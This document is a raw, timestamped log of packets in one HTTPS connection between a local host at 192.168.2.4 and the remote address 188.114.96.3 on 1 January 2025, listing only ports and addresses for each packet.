Jan 1, 2025 17:10:08.110773087 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.110817909 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.111056089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.111072063 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.111114979 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.111120939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.111145973 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.111159086 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.111469984 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.111485004 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.111531973 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.111536980 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.111562967 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.111586094 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.111695051 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.111711025 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.111769915 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.111776114 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.111906052 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.114665985 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.114685059 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.114732027 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.114738941 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.114773989 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.114787102 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.115087032 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.115104914 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.115161896 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.115168095 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.115197897 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.115216970 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.115243912 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.115257978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.115329981 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.115335941 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.115364075 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.115381956 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.201720953 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.201738119 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.201848030 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.201865911 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.201890945 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.201910019 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.201944113 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.201951027 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.201972008 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.201986074 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.202675104 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.202689886 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.202733040 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.202739000 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.202749968 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.202775002 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.202806950 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.202821016 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.202866077 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.202872038 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.202910900 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.202917099 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.202934980 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.202955008 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.202984095 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.202990055 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.203015089 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.204297066 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.204312086 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.206026077 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.206049919 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.206091881 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.206099033 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.206110954 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.206131935 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.206140041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.206151009 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.206156015 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.206181049 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.206211090 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.206423044 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.206438065 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.206489086 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.206496954 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.206506014 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.206537962 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.292169094 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.292192936 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.292274952 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.292299986 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.292670012 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.292690992 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.292725086 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.292732954 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.292745113 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.292764902 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.292779922 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.292779922 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.292792082 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.292820930 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.292845964 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.292946100 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.292962074 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.292999983 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.293006897 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.293030977 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.293055058 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.293183088 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.293200016 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.293256044 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.293262959 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.293489933 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.294341087 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.296506882 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.296521902 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.296582937 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.296586037 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.296592951 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.296632051 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.296634912 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.296683073 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.296688080 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.296778917 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.296797991 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.296832085 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.296839952 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.296852112 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.296884060 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.382894039 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.382915974 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.382966042 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383003950 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.383018017 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383050919 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383141041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.383156061 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.383202076 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383208036 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.383220911 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383253098 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383322001 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.383337975 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.383380890 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383388996 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.383413076 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383433104 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383486032 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.383507967 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.383544922 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383550882 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.383577108 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383584976 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383701086 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.383716106 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.383757114 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383764029 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.383788109 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.383814096 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.386868954 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.386913061 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.386940956 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.386950016 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.386977911 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.386993885 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.387231112 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.387247086 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.387284040 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.387294054 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.387310028 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.387326956 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.387353897 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.387372017 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.387408018 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.387413979 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.387444973 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.387453079 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.473416090 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.473438978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.473504066 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.473527908 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.473543882 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.473571062 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.473640919 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.473656893 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.473704100 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.473710060 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.473733902 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.473762035 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.473810911 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.473824978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.473856926 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.473861933 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.473892927 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.473913908 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.474118948 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.474137068 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.474184990 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.474191904 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.474203110 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.474239111 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.474416018 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.474431992 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.474473953 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.474514008 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.474519014 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.474572897 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.477538109 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.477554083 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.477606058 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.477612972 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.477644920 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.477663994 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.478120089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.478137016 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.478173971 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.478178978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.478205919 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.478214979 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.478225946 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.478230953 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.478246927 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.478264093 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.478270054 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.478296995 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.478319883 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.564157963 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.564179897 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.564244986 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.564265013 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.564306021 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.564467907 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.564483881 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.564512968 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.564519882 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.564547062 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.564567089 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.564580917 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.564599991 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.564652920 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.564660072 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.564703941 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.565026045 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.565041065 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.565088987 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.565097094 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.565138102 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.565303087 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.565318108 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.565360069 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.565367937 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.565407038 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.567939043 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.567955017 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.568010092 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.568022966 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.568067074 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.568593979 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.568608046 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.568655014 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.568665028 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.568687916 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.568706036 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.568831921 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.568845987 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.568883896 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.568891048 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.568928957 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.568938017 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.654608965 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.654625893 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.654695034 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.654715061 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.654757023 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.654930115 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.654944897 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.654998064 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.655004025 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.655045033 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.655128002 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.655143976 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.655201912 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.655208111 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.655251980 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.656847954 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.656863928 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.656934023 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.656941891 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.656982899 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.657349110 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.657365084 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.657423973 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.657430887 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.657485008 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.659888029 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.659904957 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.659976006 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.659986019 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.660044909 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.660459995 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.660475969 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.660531044 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.660537004 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.660567045 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.660590887 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.660803080 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.660818100 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.660871983 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.660878897 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.660929918 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.746509075 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.746526003 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.746584892 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.746609926 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.746630907 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.746651888 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.746668100 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.746700048 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.746757030 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.746773958 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.746819019 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.746828079 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.746864080 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.747776985 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.747797012 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.747845888 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.747853041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.747863054 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.747878075 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.747889042 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.747937918 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.747945070 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.750566006 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.750585079 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.750649929 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.750659943 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.750694990 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.751549006 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.751563072 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.751625061 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.751631975 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.751663923 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.751955032 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.751972914 CET	443	49733	188.114.96.3	192.168.2.4
